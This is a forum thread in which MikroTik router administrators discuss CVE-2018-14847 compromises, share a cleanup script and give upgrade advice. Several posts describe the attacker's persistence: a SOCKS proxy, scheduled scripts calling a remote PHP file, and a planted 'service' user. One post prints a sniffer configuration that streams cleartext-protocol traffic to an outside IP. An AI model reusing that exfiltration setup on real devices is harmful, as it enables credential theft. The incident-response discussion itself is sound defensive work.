Community discussions

 
User avatar
43north
Member Candidate
Member Candidate
Posts: 194
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:52 am

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:00 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
 
excession
just joined
Posts: 18
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:19 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
Haha, actually no, just one based on an almost complete ignorance of socks!
I did just find some interesting discussion here: viewtopic.php?t=101874
I think I now understand: I imagine he used an ssh client to open the socks connection then ssh to connect to his router through that tunnel.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 4:15 am

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?
From kobuki suggestion,I use http to login via sock not winbox.
 
blackzero
just joined
Posts: 18
Joined: Tue Aug 09, 2011 3:40 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 12:26 pm

***
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 8:59 am

If you're curious how the bug works, this article is a good read:

https://n0p.me/winbox-bug-dissection/

The vulnerability would have been less of a problem if Mik used industry-standard password-hashing methods - since the vulnerability was allowing a remote attacker to download any file, and there's a file with a very weak encryption of the admin password, it makes getting a legit login really easy. If the password were properly encrypted, then the attacker would be out of luck or at best, have to spend lots of effort cracking the password. And the better your password was, the harder to crack...

The bit about how Winbox fetches unsigned DLLs from the router is frightening as hell. You have a signed app (Winbox) grabbing DLLs (unsigned) from the router - imagine what an attacker could do by loading a trojaned DLL onto your Winbox-running PC.

I also saw a new variation on a hacked router today - they had started a packet sniffer watching for port 20, 21, 110 and 143 traffic and sending it off to a listener on the host 37.1.207.114. Fun trick! Looking for any cleartext passwords I assume. If they were more adventurous, they'd grab 5060 UDP and make some free phone calls too.
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5702
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:25 am

Winbox do not fetch DLLS for quite some time now. Do not use old winbox.
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:51 am

Winbox do not fetch DLLS for quite some time now. Do not use old winbox.
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.
 
allstarcomps
newbie
Posts: 25
Joined: Sat Jul 08, 2017 10:36 pm
Location: San Diego, CA, USA
Contact:

Re: Winbox vulnerability: please upgrade

Tue Aug 14, 2018 12:11 am

Here is the script I wrote to clean up after IP-socks/user service attacked some of the old routers I have. After cleaning up it downloads the latest ROS and does a midnight reboot to install the latest ROS and firmware. I do recommend testing in a lab before deploying in production. I did not check for disabled drop rules.
/system logging action set memory-lines=1000 [find where name=memory]
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00;
/ip socks access remove [/ip socks access find];
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
/user remove [find name=service]

/system scheduler
add name=midnightReboot on-event="/system reboot \r\
    \ny" start-time=23:59:00
/system scheduler
add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\
    dateFirmware\"]\r\
    \n:delay 2s\r\
    \n/system scheduler remove [find where name=\"midnightReboot\"]\r\
    \n/system routerboard upgrade\r\
    \n:delay 10s\r\
    \n/system reboot\r\
    \ny" start-time=startup
/system package update download

 
CsXen
Frequent Visitor
Frequent Visitor
Posts: 85
Joined: Wed Sep 10, 2014 8:31 pm
Location: Budapest - Hungary

Re: Winbox vulnerability: please upgrade

Wed Aug 22, 2018 7:04 pm

Hi.

When will you backport this vulnerability patches to the mipsle branch ? I want to upgrade our RB532's, RB133's every time, when I read this security warnings, but no .npk available. :)

Best regards: CsXen
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 9:28 am

Hi.

When will you backport this vulnerability patches to the mipsle branch ? I want to upgrade our RB532's, RB133's every time, when I read this security warnings, but no .npk available. :)

Best regards: CsXen
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29
Also. Use firewall and you are safe. The vulnerability affects devices without any protection only.
No answer to your question? How to write posts
 
npyoung
Frequent Visitor
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA
Contact:

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 9:43 am

How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 246
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 4:01 pm

How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support
I wish my FTP was FTL.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 4:18 pm

They do respond partially on port 80, but act strangely.

What do you mean by that?
 
npyoung
Frequent Visitor
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA
Contact:

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 5:59 pm

They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and able to upgrade, turn off SOCKS, remove service user and change password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the webserver from some are trying to place malicious code.
 
npyoung
Frequent Visitor
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA
Contact:

Re: Winbox vulnerability: please upgrade

Thu Aug 23, 2018 8:30 pm

How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support
Already did. Thanks for the heads up on Netinstall.
 
CsXen
Frequent Visitor
Frequent Visitor
Posts: 85
Joined: Wed Sep 10, 2014 8:31 pm
Location: Budapest - Hungary

Re: Winbox vulnerability: please upgrade

Fri Aug 24, 2018 11:22 am

When will you backport this vulnerability patches to the mipsle branch ? I want to upgrade our RB532's, RB133's every time, when I read this security warnings, but no .npk available. :)
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29

Don't forget, the last version was routeros-mipsle-6.33.5 on the MIPSLE branch, which is vulnerable. So must I downgrade to prior 6.29 to be safe?
(I can't firewall winbox port, because it must access from anywhere, from mobile or wired internet too. And I can't predict source IP... geoblocking would be a good solution. :) )

Best regards: CsXen
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5702
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Fri Aug 24, 2018 11:31 am

Use VPN (like Ipsec) to connect to the router and allow Winbox access only from VPN.
 
npyoung
Frequent Visitor
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA
Contact:

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 6:22 am

They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and able to upgrade, turn off SOCKS, remove service user and change password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the webserver from some are trying to place malicious code.
But wait, there's more. After three days of cutting the infected devices off from the mother ship (killing all incoming direct connections using NAT), most of the Dynadishes that wouldn't allow remote access to fix will respond favorably to Netinstall. However, I did run into one today that was rebooting cyclically in such a way that it wouldn't respond to power off, press reset, power on to put it in Netinstall mode. So, one scrap.
 
mistry7
Forum Veteran
Forum Veteran
Posts: 966
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 7:15 am

If the hacker has left the devices with old software, u can use the same Holes to get the set passwort, there are some Python scripts avaible for proof of concept.....
 
npyoung
Frequent Visitor
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA
Contact:

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 6:02 pm

If the hacker has left the devices with old software, u can use the same Holes to get the set passwort, there are some Python scripts avaible for proof of concept.....
Problem is that of the Dynadishes that are the hard nuts to crack (ie; not responding to Winbox as it's disabled by the hack, http doesn't work enough to get in, ssh and telnet turned off), there's no remote access to work with. It's interesting that some of these dishes, when presumably cut off from access to the mother ship by NAT degrade to cyclically rebooting every minute or so, and some others, seem to respond to a reboot and are nominally still running, even though they are infected.

BTW, what MT says about cleaning off the setup with a new one, absolutely true. Upgrading, changing passwords and rewinding the obvious stuff (second user "service", turning off SOCKS) just results in SOCKS being turned back on, and in the case of one router (in a remote area, wireless interface, which makes it hard to clean remotely), it went right back to a state where it cannot be connected to.
 
npyoung
Frequent Visitor
Frequent Visitor
Posts: 81
Joined: Thu Jun 10, 2004 2:40 am
Location: Applegate, OR, USA
Contact:

Re: Winbox vulnerability: please upgrade

Sat Aug 25, 2018 6:42 pm

Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as it's MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 8:47 am

Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as it's MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?
Using the vulnerability described in the first post, somebody could get your password in clear text, if you had unprotected access to Winbox.
When the person has your password, there are any number of things he could do. The currently most widespread attack was by somebody who connected to such routers and added a SOCKS proxy configuration that runs some cryptomining script in your web browswer, when you hit a not-found 404 webpage.
No answer to your question? How to write posts
 
eider
newbie
Posts: 27
Joined: Thu Nov 30, 2017 10:14 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 9:18 am

To add to what @normis said - I've observed the same attack with SOCKS also attempting to send mass spam via port 25 (and only port 25) using From field in form of [random username]@[domain name from revdns]. The attack also added script and scheduler to run the script. Script was pointing at /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from attacker's server before I managed to check it or it was not used yet.
 
mkx
Forum Guru
Forum Guru
Posts: 1038
Joined: Thu Mar 03, 2016 10:23 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 9:29 am

Script was pointing at /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from attacker's server before I managed to check it or it was not used yet.
Regarding the empty mikrotik.php ... keep in mind that it's a PHP which gets executed on web server. It could well be that the point of that script on server is to receive data about owned router and after it processes the data (the most important is router's public IP address), it just returns empty page of type text/plain ... so don't get over confident just because local file seems to be empty.
BR,
Metod
 
UGC
just joined
Posts: 3
Joined: Mon Nov 28, 2016 2:41 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 10:51 am

Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 10:53 am

Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?
No. Like the first post says, it affects only versionns 6.26 and above (until the fixed versions, see first post)
No answer to your question? How to write posts
 
UGC
just joined
Posts: 3
Joined: Mon Nov 28, 2016 2:41 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 11:08 am

So, there is no need to upgrade it, if I am satisfied how it works?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 11:15 am

Yes, but of course, you should do all the precautions regardless.

use non standart port and username, implement firewall and deny access from unknown addresses etc.
No answer to your question? How to write posts
 
UGC
just joined
Posts: 3
Joined: Mon Nov 28, 2016 2:41 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 27, 2018 11:23 am

Yes, I did all the precautions except the port. I will change it now. Thanks for the answer.
 
eider
newbie
Posts: 27
Joined: Thu Nov 30, 2017 10:14 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 28, 2018 3:54 pm

keep in mind that it's a PHP which gets executed on web server. It could well be that the point of that script on server is to receive data about owned router and after it processes the data (the most important is router's public IP address), it just returns empty page of type text/plain
Yes. Monitoring of active exploited routers is obvious (in fact there's no even need for this to be PHP file, simple log analyzer would do the job), however the way script was made it could allow any commands from this file to be executed on exploited routers.
 
User avatar
Chupaka
Forum Guru
Forum Guru
Posts: 8143
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus
Contact:

Re: Winbox vulnerability: please upgrade

Wed Aug 29, 2018 6:48 pm

If the hacker has left the devices with old software, u can use the same Holes to get the set passwort, there are some Python scripts avaible for proof of concept.....
Problem is that of the Dynadishes that are the hard nuts to crack (ie; not responding to Winbox as it's disabled by the hack, http doesn't work enough to get in, ssh and telnet turned off), there's no remote access to work with.
Well, maybe there was MacWinBox access? :)
Russian-speaking forum: https://forum.mikrotik.by/. Welcome!

For every complex problem, there is a solution that is simple, neat, and wrong.

MikroTik. Your life. Your routing.
 
User avatar
sunblade
just joined
Posts: 6
Joined: Tue Apr 06, 2010 6:53 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 04, 2018 1:48 am

Hello,

Packet sniffer may feed IP 37.1.207.114 with data from attacked router.

[xxx@yyy] /tool sniffer> print
only-headers: no
memory-limit: 100KiB
file-limit: 100KiB
streaming-enabled: yes
streaming-server: 37.1.207.114
filter-stream: yes
filter-interface: all
filter-ip-protocol: tcp,udp
filter-port: ftp-data,ftp,pop3,143,1500,10000



I have found some IP address of machine that was used:

IP: 95.154.216.151

aug/22 21:20:24 system,info,account user admin logged in from 95.154.216.151 via winbox
aug/22 21:20:24 system,info socks acl entry added by admin
aug/22 21:20:24 system,info socks config changed by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info,account user admin logged out from 95.154.216.151 via winbox
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info filter rule changed by admin
aug/22 21:20:54 system,info script removed by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info script removed by admin
***

IP: 198.100.28.129

aug/28 00:50:48 system,info,account user admin logged in from 198.100.28.129 via ssh
aug/28 00:51:12 system,info item changed by admin
aug/28 00:51:20 system,info item changed by admin
aug/28 00:51:27 system,info item changed by admin
aug/28 00:51:44 system,info,account user admin logged out from 198.100.28.129 via ssh
 
User avatar
Jotne
Forum Veteran
Forum Veteran
Posts: 708
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Sep 04, 2018 8:05 am

aug/22 21:20:24 system,info socks acl entry added by admin
aug/28 00:51:27 system,info item changed by admin
Think how much easier it would be to debug this if MikroTik logged all commands done on the router.
Please MT do like other network vendor, make all commands visible in the log.
On Cisco you can get it from AAA (Tacacs) that several has requested, or using syslog.
.
Use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
rwf
Frequent Visitor
Frequent Visitor
Posts: 52
Joined: Fri Dec 22, 2006 11:38 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 1:23 am

BrianHiggins,
I seemed to find it only on routers running Hotspot.



One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291, they instead scanned for something else to build the list of IPs to target. every single router that was otherwise locked down without any services beside 8291 exposed regardless of build number remained uncompromised. Might just be a coincidence, but was worth noting.
 
User avatar
indnti
Frequent Visitor
Frequent Visitor
Posts: 61
Joined: Thu Nov 09, 2006 11:53 am

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 3:04 pm

If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 3:25 pm

If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore
There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.
No answer to your question? How to write posts
 
blimbach
just joined
Posts: 8
Joined: Fri Mar 04, 2016 3:39 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:15 pm

Currently heise.de writes about attacks on Mikrotik-Devices. Maybe you can correct something on the part of Mikrotik,
because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html

They refer to the following security audit:

https://blog.netlab.360.com/7500-mikrot ... -yours-en/

BR
Boris
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:19 pm

Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html
No answer to your question? How to write posts
 
blimbach
just joined
Posts: 8
Joined: Fri Mar 04, 2016 3:39 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:26 pm

Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html
Hello Normis, I think I have read and understood all available information. Nevertheless, heise.de reports as if the security fix by mikrotik is at least questionable.

My post was not a complaint. I just wanted to point out this - possibly false - reporting.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23630
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:28 pm

I have contacted them on behalf of MikroTik. Let's see if it helps
No answer to your question? How to write posts
 
bsiege
just joined
Posts: 2
Joined: Sat Feb 27, 2016 5:31 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 4:48 pm

This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore

There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.
What's new in 6.42.7 (2018-Aug-17 09:48):
MAJOR CHANGES IN v6.42.7:
----------------------
!) security - fixed vulnerabilities CVE-2018-1156, CVE-2018-1157, CVE-2018-1158, CVE-2018-1159;
----------------------
Normally new flaw = new CVE . Be careful to verify!!
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1626
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 5:05 pm

...
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore
I have looked here https://tools.cisco.com/security/center ... nListing.x and I'm wondering who use these products?
And you are lucky if you have software upgrade plan active :-)
Real admins use real keyboards.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 5:24 pm

Currently heise.de writes about attacks on Mikrotik-Devices. Maybe you can correct something on the part of Mikrotik,
because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html
It looks like a clickbait, smelling pile of misinformational crap. They better fix the bullshitting there.
Last edited by kobuki on Wed Sep 05, 2018 5:43 pm, edited 1 time in total.
 
msatter
Forum Veteran
Forum Veteran
Posts: 967
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Wed Sep 05, 2018 5:37 pm

I deeply disappointed by Heise to not investigated further for them selves and inquire with Mikrotik. I had high regarded for Heise as a reliable and trustworthy news source.

That they neglected the bugfix version and declared any version below 6.42.x as unsafe. That Heise made this blunder is shocking.

They have now made an update in the news item to correct some errors made by them.

Update: in the update seems that Mikrotik have no love for the bugfixed version because it is not mentioned at all! Be complete in your communications! I keep repeating that.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta40 / Winbox 3.18 / MikroTik APP 1.0.13
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
schadom
Member Candidate
Member Candidate
Posts: 119
Joined: Sun Jun 25, 2017 2:47 am
Location: Austria

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 2:22 am

I deeply disappointed by Heise to not investigated further for them selves and inquire with Mikrotik. I had high regarded for Heise as a reliable and trustworthy news source.

That they neglected the bugfix version and declared any version below 6.42.x as unsafe. That Heise made this blunder is shocking.

They have now made an update in the news item to correct some errors made by them.

Update: in the update seems that Mikrotik have no love for the bugfixed version because it is not mentioned at all! Be complete in your communications! I keep repeating that.

And I'm deeply concerned by the thousands of admins and Mikrotik-customers, which evidently were unable to shield their Winbox, Webfig, Telnet and SSH management ports from the global internet, despite numerous warnings in the forums and wiki. I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default. Additionally red warning messages and confirmation popups ("Are you really sure?") should be added to Winbox/Webfig, for example if someone tries to configure Winbox/Webfig/Telnet/SSH to be reachable from 0.0.0.0/0 instead of a specific host, networks or RFC1918. Also password complexity could be enforced by default.

Unlike other vendors products like Cisco, Juniper, etc., Mikrotik's products are (more or less) targeted towards smaller environments, home setups and CPEs or WISPs, where people often are not even familiar with basic security principles or are just very lazy. While I agree it's not Mikrotik's job to educate those people regarding security, the outcome of people's laziness and lack of knowledge could at some point in the future hit us all very badly - eg. Mirai a few months ago.
 
msatter
Forum Veteran
Forum Veteran
Posts: 967
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:21 am

How to warn user of Mikrotik products to update I made already constructive remarks and when they are up to it or are forced to be up to it it will happen.

Let's start small and first get the correct information to the users and seeing today again lacking that in completeness and drive to have all the information out that informs users in a way that they don't get the impression that it is inaccurate and that the information by Mikrotik is not taken serious any more. The result is there to see and in the news and not only with Heise.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta40 / Winbox 3.18 / MikroTik APP 1.0.13
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5702
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 10:51 am

I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
 
mkx
Forum Guru
Forum Guru
Posts: 1038
Joined: Thu Mar 03, 2016 10:23 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 11:28 am

I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading say 6-year old RBs. FW rules don't get updated even if user never touched those. And 6-year old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults in ROS exist.

Another problem is when user installs ipv6 package. Firewall list is empty unless one resets whole configuration. Which is a nuisance (backup is no good, export config should be done, configuration has to be reset and exported config imported again) and user has to be aware of this. It would be much better if in this case, ipv6 config should be reset to ROS defaults upon installation of package (old config is non-existant in this case).
BR,
Metod
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 246
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 3:07 pm

I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading say 6-year old RBs. FW rules don't get updated even if user never touched those. And 6-year old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults in ROS exist.
6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
Last edited by Deantwo on Thu Sep 06, 2018 3:23 pm, edited 2 times in total.
I wish my FTP was FTL.

Who is online

Users browsing this forum: deanMKD1, derSlon and 6 guests